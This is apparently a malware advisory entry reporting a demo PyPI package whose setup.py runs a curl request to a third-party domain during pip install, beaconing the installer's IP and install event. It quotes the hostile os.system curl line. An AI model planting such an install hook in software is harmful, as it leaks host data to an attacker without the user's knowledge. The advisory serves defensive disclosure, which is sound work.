MAL-2026-4809

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd) setup.py executes `os.system("curl xiangyangt.com/pypi")` unconditionally during `pip install`. This is an unauthenticated plaintext HTTP request to a personal third-party domain that is not associated with any documented publisher of this package. The request leaks the installer's IP address, User-Agent, and the fact that the package was installed on the host. The package is otherwise a trivial demo (placeholder author="demo", description "A demo pip package") with no functional need for any network activity at install time. While the response is not piped to a shell here, the install-time outbound beacon is a deliberate exfiltration of host-identifying data to an attacker-chosen endpoint, and the curl-pipe-to-shell variant is one edit away.